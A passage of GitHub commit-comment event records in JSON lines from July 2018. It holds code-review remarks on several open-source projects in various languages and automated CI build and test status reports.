href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6c7531ea10c5afa5ef04487def2c5772a1a5d480-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.19%25-green.png)</a>\n"}},"created_at":"2018-07-06T23:06:22Z"}
{"id":"7931311398","type":"CommitCommentEvent","actor":{"login":"mbarnes-sb"},"repo":{"name":"fl4re/open_bilrost_server"},"payload":{"comment":{"id":29627195,"position":20,"line":20,"path":"package.json","commit_id":"91898ca39e402097eb65e79a6d30ed18fbda77da","created_at":"2018-07-06T23:07:08Z","updated_at":"2018-07-06T23:07:08Z","author_association":"NONE","body":"ah okay thanks. I see it's an npm thing. Funny that page claims to be 33 years out of date - https://docs.npmjs.com/files/package.json#see-also"}},"created_at":"2018-07-06T23:07:08Z"}
{"id":"7931312776","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29627202,"position":null,"line":null,"path":null,"commit_id":"6c7531ea10c5afa5ef04487def2c5772a1a5d480","created_at":"2018-07-06T23:07:49Z","updated_at":"2018-07-06T23:07:49Z","author_association":"NONE","body":"#6599-HVACAirloopUnitarySystem-does-not-honor-continuous-fan-mode-using-multispeed-heating-coil (rraustad) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6c7531ea10c5afa5ef04487def2c5772a1a5d480-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-06T23:07:49Z"}
{"id":"7931315798","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/Glyssen"},"payload":{"comment":{"id":29627207,"position":null,"line":null,"path":null,"commit_id":"31b2a2be231b5da5392f5b35a27c646c9ab05a66","created_at":"2018-07-06T23:09:11Z","updated_at":"2018-07-06T23:09:11Z","author_association":"NONE","body":"TeamCity Glyssen :: Glyssen pull requests - untagged [Build *.*.38.31b2a2be231b5da5392f5b35a27c646c9ab05a66](http://build.palaso.org/viewLog.html?buildId=124361&buildTypeId=Glyssen_GlyssenPullRequestsUntagged) outcome was **FAILURE**\nSummary: Exit code 1 (new) Build time: 00:00:33"}},"created_at":"2018-07-06T23:09:11Z"}
{"id":"7931316099","type":"CommitCommentEvent","actor":{"login":"ahob85"},"repo":{"name":"ahob85/CodeNext-CSSI-2018-Solutions"},"payload":{"comment":{"id":29627208,"position":2,"line":1,"path":"hello.js","commit_id":"2c785b889deb6a450904e3dc52eb9738a4a79c75","created_at":"2018-07-06T23:09:19Z","updated_at":"2018-07-06T23:09:19Z","author_association":"OWNER","body":"Indeed! They update hello.js in Lesson 3 to produce something like this. So\nthe code in the solution is the \"final\" version, so to speak. This is the\nonly time something like this happens. Thanks for catching it!\n\nOn Fri, Jul 6, 2018 at 2:18 PM Logan Chadderdon <notifications@github.com>\nwrote:\n\n> Students won't see readline until lesson 3 now right?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/ahob85/CodeNext-CSSI-2018-Solutions/commit/2c785b889deb6a450904e3dc52eb9738a4a79c75#commitcomment-29626344>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AVmsThuPh92scr2-21EoSVVuxbP17kLIks5uD9QpgaJpZM4VGChI>\n> .\n>\n"}},"created_at":"2018-07-06T23:09:19Z"}
{"id":"7931319341","type":"CommitCommentEvent","actor":{"login":"lwchadderdon"},"repo":{"name":"ahob85/CodeNext-CSSI-2018-Solutions"},"payload":{"comment":{"id":29627221,"position":2,"line":1,"path":"hello.js","commit_id":"2c785b889deb6a450904e3dc52eb9738a4a79c75","created_at":"2018-07-06T23:10:48Z","updated_at":"2018-07-06T23:10:48Z","author_association":"NONE","body":"Makes sense, thanks."}},"created_at":"2018-07-06T23:10:48Z"}
{"id":"7931321043","type":"CommitCommentEvent","actor":{"login":"chibenwa"},"repo":{"name":"apache/james-project"},"payload":{"comment":{"id":29627229,"position":58,"line":347,"path":"server/queue/queue-api/src/test/java/org/apache/james/queue/api/MailQueueContract.java","commit_id":"ac2f7a9eb3955d4241281b2b1ba7b03d14a82a7c","created_at":"2018-07-06T23:11:32Z","updated_at":"2018-07-06T23:11:32Z","author_association":"CONTRIBUTOR","body":"We can either remove this toString method or rely on MoreObjects"}},"created_at":"2018-07-06T23:11:32Z"}
{"id":"7931323437","type":"CommitCommentEvent","actor":{"login":"keshav2010"},"repo":{"name":"keshav2010/RGBNinja"},"payload":{"comment":{"id":29627231,"position":15,"line":26,"path":"index.html","commit_id":"aa41f760550667b9ef3c3877c9082fe4aeb7d13d","created_at":"2018-07-06T23:12:39Z","updated_at":"2018-07-06T23:12:39Z","author_association":"OWNER","body":"line 26 to 28 was initially within setTimeout however emit isn't working, with / without it"}},"created_at":"2018-07-06T23:12:39Z"}
{"id":"7931324262","type":"CommitCommentEvent","actor":{"login":"chibenwa"},"repo":{"name":"apache/james-project"},"payload":{"comment":{"id":29627233,"position":124,"line":408,"path":"server/queue/queue-jms/src/main/java/org/apache/james/queue/jms/JMSMailQueue.java","commit_id":"ac2f7a9eb3955d4241281b2b1ba7b03d14a82a7c","created_at":"2018-07-06T23:12:59Z","updated_at":"2018-07-06T23:12:59Z","author_association":"CONTRIBUTOR","body":"Can we extract that long lambda in a dedicated method?"}},"created_at":"2018-07-06T23:12:59Z"}
{"id":"7931325865","type":"CommitCommentEvent","actor":{"login":"Backurio"},"repo":{"name":"Backurio/Match3Replica"},"payload":{"comment":{"id":29627240,"position":null,"line":null,"path":null,"commit_id":"7c5ce84c06c181cdd1ac97906e93fee1ae319e62","created_at":"2018-07-06T23:13:43Z","updated_at":"2018-07-06T23:13:43Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Implement Gameplay](https://trello.com/c/ZAY0XQJa/2-implement-gameplay)"}},"created_at":"2018-07-06T23:13:43Z"}
{"id":"7931327037","type":"CommitCommentEvent","actor":{"login":"chibenwa"},"repo":{"name":"apache/james-project"},"payload":{"comment":{"id":29627247,"position":132,"line":416,"path":"server/queue/queue-jms/src/main/java/org/apache/james/queue/jms/JMSMailQueue.java","commit_id":"ac2f7a9eb3955d4241281b2b1ba7b03d14a82a7c","created_at":"2018-07-06T23:14:17Z","updated_at":"2018-07-06T23:14:17Z","author_association":"CONTRIBUTOR","body":"We can avoid this double allocation by extracting this try catch block..."}},"created_at":"2018-07-06T23:14:17Z"}
{"id":"7931327398","type":"CommitCommentEvent","actor":{"login":"wallythewebdev"},"repo":{"name":"kevinoes/page-slider-js"},"payload":{"comment":{"id":29627250,"position":null,"line":null,"path":null,"commit_id":"4e90218179f0c25b3bccdd1859a007dacfefb07f","created_at":"2018-07-06T23:14:28Z","updated_at":"2018-07-06T23:14:28Z","author_association":"NONE","body":"Hi there, this is amazing! i've been trying to find something like this for ages! \r\n\r\nI was wondering (as I always want to learn more) - if I could donate say like $20NZD to you and you write a little tutorial on whats going on in the script and why? \r\n\r\nThank - \r\n\r\nWally"}},"created_at":"2018-07-06T23:14:28Z"}
{"id":"7931329858","type":"CommitCommentEvent","actor":{"login":"chibenwa"},"repo":{"name":"apache/james-project"},"payload":{"comment":{"id":29627261,"position":1,"line":1,"path":"server/queue/queue-jms/src/main/java/org/apache/james/queue/jms/JMSSerializationUtils.java","commit_id":"ac2f7a9eb3955d4241281b2b1ba7b03d14a82a7c","created_at":"2018-07-06T23:15:36Z","updated_at":"2018-07-06T23:15:36Z","author_association":"CONTRIBUTOR","body":"You ate missing the compulsory heading license."}},"created_at":"2018-07-06T23:15:36Z"}
{"id":"7931330389","type":"CommitCommentEvent","actor":{"login":"chibenwa"},"repo":{"name":"apache/james-project"},"payload":{"comment":{"id":29627262,"position":1,"line":1,"path":"server/queue/queue-jms/src/test/java/org/apache/james/queue/jms/JMSSerializationUtilsTest.java","commit_id":"ac2f7a9eb3955d4241281b2b1ba7b03d14a82a7c","created_at":"2018-07-06T23:15:51Z","updated_at":"2018-07-06T23:15:51Z","author_association":"CONTRIBUTOR","body":"Here too"}},"created_at":"2018-07-06T23:15:51Z"}
{"id":"7931330930","type":"CommitCommentEvent","actor":{"login":"MarcusHurney"},"repo":{"name":"input-output-hk/react-polymorph"},"payload":{"comment":{"id":29627265,"position":25,"line":136,"path":"source/components/Autocomplete.js","commit_id":"6b3b44524d1cae4a8a2e06468b791e9bad1e427f","created_at":"2018-07-06T23:16:08Z","updated_at":"2018-07-06T23:16:08Z","author_association":"CONTRIBUTOR","body":"@DominikGuzei \r\nNice! Thanks for the help here."}},"created_at":"2018-07-06T23:16:08Z"}
{"id":"7931332160","type":"CommitCommentEvent","actor":{"login":"chibenwa"},"repo":{"name":"apache/james-project"},"payload":{"comment":{"id":29627269,"position":95,"line":95,"path":"server/queue/queue-jms/src/test/java/org/apache/james/queue/jms/JMSSerializationUtilsTest.java","commit_id":"ac2f7a9eb3955d4241281b2b1ba7b03d14a82a7c","created_at":"2018-07-06T23:16:42Z","updated_at":"2018-07-06T23:16:42Z","author_association":"CONTRIBUTOR","body":"Extra line."}},"created_at":"2018-07-06T23:16:42Z"}
{"id":"7931332753","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/Glyssen"},"payload":{"comment":{"id":29627271,"position":null,"line":null,"path":null,"commit_id":"31b2a2be231b5da5392f5b35a27c646c9ab05a66","created_at":"2018-07-06T23:17:00Z","updated_at":"2018-07-06T23:17:00Z","author_association":"NONE","body":"TeamCity Glyssen :: Glyssen pull requests [Build *.*.724.31b2a2be231b5da5392f5b35a27c646c9ab05a66](http://build.palaso.org/viewLog.html?buildId=124362&buildTypeId=Glyssen_GlyssenPullRequests) outcome was **SUCCESS**\nSummary: Tests passed: 1855, ignored: 18 Build time: 00:08:20"}},"created_at":"2018-07-06T23:17:00Z"}
{"id":"7931333475","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/Glyssen"},"payload":{"comment":{"id":29627274,"position":null,"line":null,"path":null,"commit_id":"c721dd9dc17a5389a7bed916e97f9ddc6e68383e","created_at":"2018-07-06T23:17:17Z","updated_at":"2018-07-06T23:17:17Z","author_association":"NONE","body":"TeamCity Glyssen :: Glyssen pull requests - untagged [Build *.*.39.c721dd9dc17a5389a7bed916e97f9ddc6e68383e](http://build.palaso.org/viewLog.html?buildId=124363&buildTypeId=Glyssen_GlyssenPullRequestsUntagged) outcome was **FAILURE**\nSummary: Exit code 1 (new) Build time: 00:00:32"}},"created_at":"2018-07-06T23:17:17Z"}
{"id":"7931334504","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/Glyssen"},"payload":{"comment":{"id":29627282,"position":null,"line":null,"path":null,"commit_id":"c721dd9dc17a5389a7bed916e97f9ddc6e68383e","created_at":"2018-07-06T23:17:49Z","updated_at":"2018-07-06T23:17:49Z","author_association":"NONE","body":"TeamCity Glyssen :: Glyssen pull requests [Build *.*.725.c721dd9dc17a5389a7bed916e97f9ddc6e68383e](http://build.palaso.org/viewLog.html?buildId=124364&buildTypeId=Glyssen_GlyssenPullRequests) outcome was **FAILURE**\nSummary: Compilation error: GlyssenTests\\GlyssenTests.csproj (new) Build time: 00:00:46"}},"created_at":"2018-07-06T23:17:49Z"}
{"id":"7931335888","type":"CommitCommentEvent","actor":{"login":"chibenwa"},"repo":{"name":"apache/james-project"},"payload":{"comment":{"id":29627289,"position":86,"line":86,"path":"server/queue/queue-jms/src/test/java/org/apache/james/queue/jms/JMSSerializationUtilsTest.java","commit_id":"ac2f7a9eb3955d4241281b2b1ba7b03d14a82a7c","created_at":"2018-07-06T23:18:29Z","updated_at":"2018-07-06T23:18:29Z","author_association":"CONTRIBUTOR","body":"I'm not sure this equals implementation do pass the checkstyle. We tend to use another template usually"}},"created_at":"2018-07-06T23:18:29Z"}
{"id":"7931336385","type":"CommitCommentEvent","actor":{"login":"criezy"},"repo":{"name":"scummvm/scummvm"},"payload":{"comment":{"id":29627290,"position":null,"line":null,"path":null,"commit_id":"42c8212713d5a0b5a60cf5319667c647f7376b8c","created_at":"2018-07-06T23:18:43Z","updated_at":"2018-07-06T23:18:43Z","author_association":"MEMBER","body":"With this commit I now get hundreds of warnings when compiling:\r\n`warning: unknown warning option '-Wno-pragma-pack'; did you mean '-Wno-pragmas'? [-Wunknown-warning-option]`\r\n\r\nThis is with `Apple LLVM version 9.0.0 (clang-900.0.39.2)` on macOS Sierra with Xcode 9.2 and it reports that `__clang_major__` is 9."}},"created_at":"2018-07-06T23:18:43Z"}
{"id":"7931338230","type":"CommitCommentEvent","actor":{"login":"EduenSarceno"},"repo":{"name":"EduenSarceno/NadekoBot"},"payload":{"comment":{"id":29627295,"position":16,"line":319,"path":"NadekoBot.Core/Modules/Searches/Searches.cs","commit_id":"633dcb3e285cb17cc7ed90cb8255da4ab6f1d283","created_at":"2018-07-06T23:19:38Z","updated_at":"2018-07-06T23:19:38Z","author_association":"OWNER","body":"GoogleApi it self aware about percent-encoding, don't need it"}},"created_at":"2018-07-06T23:19:38Z"}
{"id":"7931339205","type":"CommitCommentEvent","actor":{"login":"mwarning"},"repo":{"name":"dakhnod/Meshenger"},"payload":{"comment":{"id":29627297,"position":141,"line":328,"path":"app/src/main/java/d/d/meshenger/MainService.java","commit_id":"e96867ec3f26475b7ce3f5121d006d143506ae10","created_at":"2018-07-06T23:20:09Z","updated_at":"2018-07-06T23:20:09Z","author_association":"NONE","body":"Du rufst s.close() in Zeile 336 auf; aber was passiert bei einer Exception wie z.B. in Zeile 328? Wird der Socket dann automatisch geschlossen?"}},"created_at":"2018-07-06T23:20:09Z"}
{"id":"7931342289","type":"CommitCommentEvent","actor":{"login":"EduenSarceno"},"repo":{"name":"EduenSarceno/NadekoBot"},"payload":{"comment":{"id":29627306,"position":15,"line":319,"path":"NadekoBot.Core/Modules/Searches/Searches.cs","commit_id":"633dcb3e285cb17cc7ed90cb8255da4ab6f1d283","created_at":"2018-07-06T23:21:37Z","updated_at":"2018-07-06T23:21:37Z","author_association":"OWNER","body":"GoogleApi it self aware about percent-encoding, don't need it"}},"created_at":"2018-07-06T23:21:37Z"}
{"id":"7931343280","type":"CommitCommentEvent","actor":{"login":"dturanski"},"repo":{"name":"dturanski/sgf-767"},"payload":{"comment":{"id":29627308,"position":null,"line":null,"path":null,"commit_id":"9940eed7e669ece0ac456408c6b236e4203537c7","created_at":"2018-07-06T23:22:07Z","updated_at":"2018-07-06T23:22:07Z","author_association":"OWNER","body":"The only significant difference I can see is the basePackages attribute which is likely required since this is in the config package. If that works I’ll be satisfied. Thanks"}},"created_at":"2018-07-06T23:22:07Z"}
{"id":"7931346156","type":"CommitCommentEvent","actor":{"login":"orivej"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29627317,"position":null,"line":null,"path":null,"commit_id":"f2f7c4287ff257e7c219737b0d7416a7965c0c3e","created_at":"2018-07-06T23:23:31Z","updated_at":"2018-07-06T23:23:31Z","author_association":"CONTRIBUTOR","body":"See #43130. The patch was cached by cache.nixos.org, you can retrieve it with `nix-build -A python --check`."}},"created_at":"2018-07-06T23:23:31Z"}
{"id":"7931346365","type":"CommitCommentEvent","actor":{"login":"dakhnod"},"repo":{"name":"dakhnod/Meshenger"},"payload":{"comment":{"id":29627318,"position":141,"line":328,"path":"app/src/main/java/d/d/meshenger/MainService.java","commit_id":"e96867ec3f26475b7ce3f5121d006d143506ae10","created_at":"2018-07-06T23:23:38Z","updated_at":"2018-07-06T23:23:38Z","author_association":"OWNER","body":"ich bin davon ausgegangen, dass die einzige Exception bei dem Socket-aufruf geworfen werden kann.\r\nSollte dies passieren, ist die Adresse invalide, und das Socket muss nicht geschlossen werden, da es ja eh nicht richtig geöffnet wurde."}},"created_at":"2018-07-06T23:23:38Z"}
{"id":"7931347321","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"denio-rus/thinknetica-ruby"},"payload":{"comment":{"id":29627321,"position":18,"line":18,"path":"lesson8/validation_methods.rb","commit_id":"635e1dc2310bd37b4c1593ae49e0ef00b2259fd7","created_at":"2018-07-06T23:24:06Z","updated_at":"2018-07-06T23:24:06Z","author_association":"NONE","body":"А не получается совместить этот метод с методом validate_object? Как-то они подозрительно похожи."}},"created_at":"2018-07-06T23:24:06Z"}
{"id":"7931358539","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"denio-rus/thinknetica-ruby"},"payload":{"comment":{"id":29627365,"position":13,"line":13,"path":"lesson8/validation_methods.rb","commit_id":"635e1dc2310bd37b4c1593ae49e0ef00b2259fd7","created_at":"2018-07-06T23:29:49Z","updated_at":"2018-07-06T23:29:49Z","author_association":"NONE","body":"Не критично, но чаще всего я вижу слово ```klass``` для использования класса, который передается аргументом. Что-б не использовать зарезервированное слово ```class```.  klass как-бы подразумевает, что мы используем класс определенный в нашем коде."}},"created_at":"2018-07-06T23:29:49Z"}
{"id":"7931360475","type":"CommitCommentEvent","actor":{"login":"ssalone"},"repo":{"name":"ssalone/hello-world"},"payload":{"comment":{"id":29627377,"position":null,"line":null,"path":null,"commit_id":"829b0aa01f7a3de524fbc7e5891e0420a1985124","created_at":"2018-07-06T23:30:44Z","updated_at":"2018-07-06T23:30:44Z","author_association":"OWNER","body":"Branch created"}},"created_at":"2018-07-06T23:30:44Z"}
{"id":"7931364525","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"denio-rus/thinknetica-ruby"},"payload":{"comment":{"id":29627391,"position":39,"line":39,"path":"lesson8/train.rb","commit_id":"635e1dc2310bd37b4c1593ae49e0ef00b2259fd7","created_at":"2018-07-06T23:32:46Z","updated_at":"2018-07-06T23:32:46Z","author_association":"NONE","body":"Индентация уехала"}},"created_at":"2018-07-06T23:32:46Z"}
{"id":"7931364943","type":"CommitCommentEvent","actor":{"login":"memoryboxes"},"repo":{"name":"SpiderClub/haipproxy"},"payload":{"comment":{"id":29627395,"position":null,"line":null,"path":null,"commit_id":"0441f700df4adf7e5e3c7745ef8b5d38f57dc9ad","created_at":"2018-07-06T23:33:01Z","updated_at":"2018-07-06T23:33:01Z","author_association":"CONTRIBUTOR","body":"@magicknight 抱歉，之前没有注意到前面已经加了这些库，已修改。"}},"created_at":"2018-07-06T23:33:01Z"}
{"id":"7931369236","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"denio-rus/thinknetica-ruby"},"payload":{"comment":{"id":29627404,"position":106,"line":106,"path":"lesson8/train.rb","commit_id":"635e1dc2310bd37b4c1593ae49e0ef00b2259fd7","created_at":"2018-07-06T23:35:12Z","updated_at":"2018-07-06T23:35:12Z","author_association":"NONE","body":"Если ты используешь yield - параметры не нужно указывать. Просто пишешь блок сразу после вызова метода, и yield будет передавать контроль в блок при каждой итерации"}},"created_at":"2018-07-06T23:35:12Z"}
{"id":"7931370141","type":"CommitCommentEvent","actor":{"login":"dakhnod"},"repo":{"name":"dakhnod/Meshenger"},"payload":{"comment":{"id":29627407,"position":177,"line":364,"path":"app/src/main/java/d/d/meshenger/MainService.java","commit_id":"e96867ec3f26475b7ce3f5121d006d143506ae10","created_at":"2018-07-06T23:35:41Z","updated_at":"2018-07-06T23:35:41Z","author_association":"OWNER","body":"ich verstehe, worauf du hinauswillst.\r\nAber zum glück ist das keine jmp oder goto-anweisung, continue sorgt nur dafür, dass die schleife weitergeht.\r\nErgo wird dann der nächste wert aus der Liste vorgenommen.\r\nDas Label ist dort aus dem Grund, dass das continue ohne das label die loop in Z363 fortsetzen würde, sich mit dem Label aber auf die Loop in Z359 bezieht."}},"created_at":"2018-07-06T23:35:41Z"}
{"id":"7931371827","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"denio-rus/thinknetica-ruby"},"payload":{"comment":{"id":29627415,"position":49,"line":49,"path":"lesson8/train.rb","commit_id":"635e1dc2310bd37b4c1593ae49e0ef00b2259fd7","created_at":"2018-07-06T23:36:33Z","updated_at":"2018-07-06T23:36:33Z","author_association":"NONE","body":"индентация уехала"}},"created_at":"2018-07-06T23:36:33Z"}
{"id":"7931372205","type":"CommitCommentEvent","actor":{"login":"achmad2626"},"repo":{"name":"4L13199/LITESPAM"},"payload":{"comment":{"id":29627418,"position":2,"line":2,"path":"README.md","commit_id":"be4b3765f96fd23f98bb025c32739cfa493d04ae","created_at":"2018-07-06T23:36:46Z","updated_at":"2018-07-06T23:36:46Z","author_association":"NONE","body":"good"}},"created_at":"2018-07-06T23:36:46Z"}
{"id":"7931372413","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/Glyssen"},"payload":{"comment":{"id":29627419,"position":null,"line":null,"path":null,"commit_id":"ad72f20fef6ba667c535ea1f143da9d7a5bb61e2","created_at":"2018-07-06T23:36:53Z","updated_at":"2018-07-06T23:36:53Z","author_association":"NONE","body":"TeamCity Glyssen :: Glyssen pull requests - untagged [Build *.*.40.ad72f20fef6ba667c535ea1f143da9d7a5bb61e2](http://build.palaso.org/viewLog.html?buildId=124366&buildTypeId=Glyssen_GlyssenPullRequestsUntagged) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:00:27"}},"created_at":"2018-07-06T23:36:53Z"}
{"id":"7931373756","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"denio-rus/thinknetica-ruby"},"payload":{"comment":{"id":29627428,"position":42,"line":42,"path":"lesson8/station.rb","commit_id":"635e1dc2310bd37b4c1593ae49e0ef00b2259fd7","created_at":"2018-07-06T23:37:31Z","updated_at":"2018-07-06T23:37:31Z","author_association":"NONE","body":"Если ты используешь yield - параметры не нужно указывать. Просто пишешь блок сразу после вызова метода, и yield будет передавать контроль в блок при каждой итерации"}},"created_at":"2018-07-06T23:37:31Z"}
{"id":"7931380383","type":"CommitCommentEvent","actor":{"login":"mwarning"},"repo":{"name":"dakhnod/Meshenger"},"payload":{"comment":{"id":29627448,"position":141,"line":328,"path":"app/src/main/java/d/d/meshenger/MainService.java","commit_id":"e96867ec3f26475b7ce3f5121d006d143506ae10","created_at":"2018-07-06T23:41:12Z","updated_at":"2018-07-06T23:41:12Z","author_association":"NONE","body":"In Zeile 328 ist der socket definitiv geöffnet. Daher hätte ich in Zeile 342 ein s.close() mit eingebaut. Aber ich kenne mich jetzt auch nicht gut mit der Java API aus.."}},"created_at":"2018-07-06T23:41:12Z"}
{"id":"7931380475","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"denio-rus/thinknetica-ruby"},"payload":{"comment":{"id":29627449,"position":6,"line":6,"path":"lesson8/cargo_wagon.rb","commit_id":"635e1dc2310bd37b4c1593ae49e0ef00b2259fd7","created_at":"2018-07-06T23:41:14Z","updated_at":"2018-07-06T23:41:14Z","author_association":"NONE","body":"Занимаемое место в вагонах разного типа можно унифицировать. Если назвать параметры одинаково в CargoWagon и PassengerWagon, то будет явно, что эти параметры можно вытащить в родителя"}},"created_at":"2018-07-06T23:41:14Z"}
{"id":"7931384991","type":"CommitCommentEvent","actor":{"login":"dakhnod"},"repo":{"name":"dakhnod/Meshenger"},"payload":{"comment":{"id":29627460,"position":141,"line":328,"path":"app/src/main/java/d/d/meshenger/MainService.java","commit_id":"e96867ec3f26475b7ce3f5121d006d143506ae10","created_at":"2018-07-06T23:43:42Z","updated_at":"2018-07-06T23:43:42Z","author_association":"OWNER","body":"ist im nächsten commit."}},"created_at":"2018-07-06T23:43:42Z"}
{"id":"7931384996","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"denio-rus/thinknetica-ruby"},"payload":{"comment":{"id":29627461,"position":6,"line":6,"path":"lesson8/cargo_wagon.rb","commit_id":"635e1dc2310bd37b4c1593ae49e0ef00b2259fd7","created_at":"2018-07-06T23:43:42Z","updated_at":"2018-07-06T23:43:42Z","author_association":"NONE","body":"И ридеры тоже уйдут в суперкласс"}},"created_at":"2018-07-06T23:43:42Z"}
{"id":"7931385367","type":"CommitCommentEvent","actor":{"login":"guimafelipe"},"repo":{"name":"dhasuda/lab6Mokz"},"payload":{"comment":{"id":29627462,"position":null,"line":null,"path":null,"commit_id":"66357b7bf75833bbad3e2b3475194e33e9c4494d","created_at":"2018-07-06T23:43:55Z","updated_at":"2018-07-06T23:43:55Z","author_association":"NONE","body":"Força "}},"created_at":"2018-07-06T23:43:55Z"}
{"id":"7931386099","type":"CommitCommentEvent","actor":{"login":"flarnie"},"repo":{"name":"facebook/react"},"payload":{"comment":{"id":29627463,"position":null,"line":null,"path":null,"commit_id":"919d7345693bfc1c693bf2a30b316a572b25ecb8","created_at":"2018-07-06T23:44:17Z","updated_at":"2018-07-06T23:44:17Z","author_association":"CONTRIBUTOR","body":"![seal_of_approval](https://user-images.githubusercontent.com/1114467/42404160-cfaba330-813b-11e8-9140-b1d78a0178bc.jpg)\r\n"}},"created_at":"2018-07-06T23:44:17Z"}
{"id":"7931386148","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/Glyssen"},"payload":{"comment":{"id":29627464,"position":null,"line":null,"path":null,"commit_id":"ad72f20fef6ba667c535ea1f143da9d7a5bb61e2","created_at":"2018-07-06T23:44:19Z","updated_at":"2018-07-06T23:44:19Z","author_association":"NONE","body":"TeamCity Glyssen :: Glyssen pull requests [Build *.*.726.ad72f20fef6ba667c535ea1f143da9d7a5bb61e2](http://build.palaso.org/viewLog.html?buildId=124365&buildTypeId=Glyssen_GlyssenPullRequests) outcome was **SUCCESS**\nSummary: Tests passed: 1845, ignored: 18 Build time: 00:08:10"}},"created_at":"2018-07-06T23:44:19Z"}
{"id":"7931390113","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29627478,"position":null,"line":null,"path":null,"commit_id":"c3325181045b3082690eff766212293083d3ebca","created_at":"2018-07-06T23:46:24Z","updated_at":"2018-07-06T23:46:24Z","author_association":"NONE","body":"#6712-Zone-Coil-Autosizing-does-not-include-impact-of-AirTerminalSingleDuctMixer (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2959 of 2975 tests passed, 21 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 26 tests had: EIO diffs.\n * 12 tests had: ESO small diffs.\n * 8 tests had: MTR small diffs.\n * 9 tests had: Table small diffs.\n * 7 tests had: ERR diffs.\n * 14 tests had: ESO big diffs.\n * 15 tests had: Table big diffs.\n * 9 tests had: MTR big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 627\n * Failed: 16\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c3325181045b3082690eff766212293083d3ebca-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c3325181045b3082690eff766212293083d3ebca-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.46%25-yellow.png)</a> \n"}},"created_at":"2018-07-06T23:46:24Z"}
{"id":"7931394264","type":"CommitCommentEvent","actor":{"login":"dakhnod"},"repo":{"name":"dakhnod/Meshenger"},"payload":{"comment":{"id":29627489,"position":174,"line":361,"path":"app/src/main/java/d/d/meshenger/MainService.java","commit_id":"e96867ec3f26475b7ce3f5121d006d143506ae10","created_at":"2018-07-06T23:48:37Z","updated_at":"2018-07-06T23:48:37Z","author_association":"OWNER","body":"das mit dem regex hat sich eh iwie nicht richtig angefühlt"}},"created_at":"2018-07-06T23:48:37Z"}
{"id":"7931395809","type":"CommitCommentEvent","actor":{"login":"flarnie"},"repo":{"name":"facebook/react"},"payload":{"comment":{"id":29627494,"position":null,"line":null,"path":null,"commit_id":"26e0b536357a21476ff483474627b2aa68724afa","created_at":"2018-07-06T23:49:25Z","updated_at":"2018-07-06T23:49:25Z","author_association":"CONTRIBUTOR","body":"> In the future, the plan is to stop using these methods explicitly in most places, and instead delegate to a warning system that includes stacks automatically.\r\n\r\nYes! @sebmarkbage talked me through this idea too, and this change does seem helpful in paving the way. Also seems to me that this reduces complexity, one less module to keep track of."}},"created_at":"2018-07-06T23:49:25Z"}
{"id":"7931396495","type":"CommitCommentEvent","actor":{"login":"123leoyang"},"repo":{"name":"123leoyang/Summer2018"},"payload":{"comment":{"id":29627496,"position":null,"line":null,"path":null,"commit_id":"df0bdbed61960a8bf36edd5ed8d836ce1d17e35a","created_at":"2018-07-06T23:49:45Z","updated_at":"2018-07-06T23:49:45Z","author_association":"OWNER","body":"Hi dad"}},"created_at":"2018-07-06T23:49:45Z"}
